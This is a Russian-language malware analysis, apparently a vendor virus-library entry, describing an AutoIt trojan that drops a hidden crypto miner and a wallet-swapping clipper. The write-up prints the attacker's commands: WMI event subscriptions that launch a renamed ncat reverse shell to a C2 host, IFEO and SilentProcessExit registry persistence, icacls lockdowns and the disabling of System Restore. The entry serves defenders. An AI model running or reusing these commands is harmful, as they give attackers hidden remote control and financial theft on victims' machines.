SHA1-хеши:
- 09cffca796dce03c74950e10a349079d9afe3964Б
- 419ef7dc18d178247daf68f0571a3dccb662792fБ
- 9c17f83aba6b60c8d461a923050fc9a19e386ec1Б
- e7ac807a446640a95a961fb5d873c051ee8c2793Б
Описание
Вредоносный AutoIt скрипт для ОС Windows, выполняющий доставку на скомпрометированную систему ряда файлов, необходимых для реализации скрытой добычи криптовалюты и подмены данных в буфере обмена.
Принцип действия
Запуск скрипта выполняется дроппером, представляющим собой самораспаковывающийся архив. После запуска Trojan.AutoIt.1443 выполняет следующие действия:
1. Проверка списка процессов на наличие следующих строк из следующего списка:
dUcAvastUI.exe
avgui.exe
avp.exe
avpui.exe
UninstallTool.exe
UninstallToolHelper.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
httpdebuggerui.exe
wireshark.exe
fiddler.exe
vboxservice.exe
df5serv.exe
vboxtray.exe
vmtoolsd.exe
vmwaretray.exe
ida64.exe
ollydbg.exe
pIIfaXUcjllboZRestudio.exe
vmwareuser.exe
vgauthservice.exe
vmacthlp.exe
vmsrvc.exe
x32dbg.exe
x64dbg.exe
x96dbg.exe
vmusrvc.exe
prl_cc.exe
prl_tools.exe
qemu-ga.exe
joeboxcontrol.exe
ksdumperclient.exe
xenservice.exe
joeboxserver.exe
devenv.exe
immunitydebugger.exe
importrec.exe
windbg.exe
32dbg.exe
64dbg.exex
protection_id.exex
scylla_x86.exe
scylla_x64.exe
scylla.exe
idau64.exe
idau.exe
idaq64.exe
idaq.exe
idaw.exe
idag64.exe
idag.exe
ida.exe
При нахождении любой из этих программ скрипт завершает свою работу.
2. Создание директорий
C:\ProgramData\NUL..C:\ProgramData\AUX..
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Для директорий C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} и C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D} устанавливаются атрибуты SYSTEM, HIDDEN и READONLY.
3. Распаковка файлов
C:\ProgramData\NUL..\libssl-1_1.dllC:\ProgramData\NUL..\vcruntime140.dll
C:\ProgramData\NUL..\libcrypto-1_1.dll
C:\ProgramData\NUL..\StartMenuExperienceHost.exe
Данные файлы не являются вредоносными и предназначены для реализации сетевого взаимодействия посредством исполняемого файла StartMenuExperienceHost.exe, представляющего собой переименованный ncat.exe. Этот файл устанавливает соединение с С2-сервером злоумышленников. Детектируется как Tool.Ncat.1.
C:\ProgramData\AUX..\ShellExt.dllC:\ProgramData\AUX..\DeviceId.dll
Файл ShellExt.dll, находящийся во всех директориях, представляет собой переименованный интерпретатор языка AutoIt. В данном случае он необходим для запуска вредоносного скрипта, находящегося в оверлее файла DeviceId.dll, имеющего действующую цифровую подпись. Скрипт распаковывает и запускает майнер SilentCryptoMiner (детектируется как Trojan.BtcMine.3767), который встраивается в процесс explorer.exe, используя технику Process Hollowing.
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.batC:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\ShellExt.dll
C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\DeviceId.dll
Аналогичным образом, в данной директории интерпретатор AutoIt (ShellExt.dll), инициируемый nun.bat, выполняет запуск вредоносного скрипта в оверлее файла DeviceId.dll для добычи криптовалюты.
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun.batC:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellExt.dll
C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\7zxa.dll
Данный набор файлов предназначен для запуска клиппера, скрытого в библиотеке 7zxa.dll, который также запускается под видом explorer.exe с помощью методики Process Hollowing. Клиппер выполняет подмену адресов криптокошельков.
C:\ProgramData\inst.bat
Этот сценарий выполняет те же функции, которые описаны в пункте 4.1 ниже.
4. Создание событий и изменение реестра
4.1 События, обеспечивающие подключение к С2-серверу с помощью StartMenuExperienceHost.exe (ncat.exe)
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers[.]com 5353 -e cmd.exe"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nur", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nur", ExecutablePath="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nur"", Consumer="CommandLineEventConsumer.Name="nur""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="per", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="per", ExecutablePath="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat", CommandLineTemplate="C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="per"", Consumer="CommandLineEventConsumer.Name="per""
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId[.]dll"
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""
4.2 Добавление ключей реестра для запуска вредоносных файлов с помощью техники IFEO
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MoUsoCoreWorker.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe" /v Debugger /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\svchost.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun[.]bat" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrustedInstaller.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v ReportingMode /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\TrustedInstaller.exe" /v MonitorProcess /t REG_SZ /d "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}\xun[.]bat" /f
5. Настройка
5.1 Изменение прав доступа к директориям путем выполнения следующих команд
icacls "C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /Cicacls "C:\ProgramData\Classic.{20D04FE0-3AEA-1069-A2D8-08002B30309D}" /deny *S-1-1-0:(DE,WDAC,WO,AS,AD,WEA,DC,WA,WD) /T /C
Это отзывает следующие разрешения:
- Удаление
- Изменение параметров избирательного управления доступом
- Запись для владельца
- Изменение прав доступа
- Создание файлов / дозапись данных
- Запись атрибутов, в том числе дополнительных
- Удаление подпапок и файлов
- Создание файлов / запись данных
5.2 Отключение восстановления системы путем изменения ветвей реестра:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableSR=1HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore - DisableConfig=1
Затем выполняется команда:
reagentc /disable5.3 Запуск файла C:\ProgramData\inst.bat
6. Получение сведений о скомпрометированной машине
Отправка GET-запроса к ip-api[.]com/json для получения геолокационных данных. Сведения о модели видеокарты и установленных антивирусных программах собираются при помощи утилиты winmgmt.exe, модель ЦП извлекается из ветви реестра HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, а информация о операционной системе содержится в переменных @OSVersion и @OSArch в Autoit.
Полученная информация отправляется Telegram боту.
Матрица Mitre
| Этап | Техника |
|---|---|
| Выполнение (TA0002) |
Инструментарий управления Windows (T1047) Интерпретаторы командной строки и сценариев (T1059) Выполнение сценариев (T0853) Общие модули (T1129) |
| Закрепление (TA0003) |
Выполнение по событию (T1546) Внедрение в IFEO (T1546.011) Автозапуск при загрузке или входе в систему (T1547) Ключи автозапуска в реестре / Папка автозагрузки (T1547.001) Перехват исполнения (T1574) Загрузка сторонних DLL-библиотек (T1574.002) Эксплуатация разрешений для файлов служб (T1574.010) |
| Повышение привилегий (TA0004) |
Внедрение кода в процессы (T1055) Внедрение в пустой процесс (T1055.012) Выполнение по событию (T1546) Внедрение в IFEO (T1546.012) Ключи автозапуска в реестре / Папка автозагрузки (T1547.001) |
| Предотвращение обнаружения (TA0005) |
Обфусцированные файлы или данные (T1027) Маскировка (T1036) Внедрение кода в процессы (T1055) Внедрение в пустой процесс (T1055.012) Устранение индикаторов (T1070) Удаление файла (T1070.004) Изменение реестра (T1112) Изменение разрешений для файлов и каталогов (T1222) Сокрытие артефактов (T1564) Скрытые файлы и каталоги (T1564.001) Обход виртуализации или песочницы (T1497) |
| Изучение (TA0007) |
Изучение системы (T1082) Изучение установленного ПО (T1518) Изучение местоположения системы (T1614) |
| Сбор данных (TA0009) |
Данные из буфера обмена (T1115) Захват экрана (T1113) |
| Организация управления (TA0011) | Зашифрованный канал (T1573) |
| Деструктивное воздействие (TA0040) | Завершение работы или перезагрузка системы (T1529) |
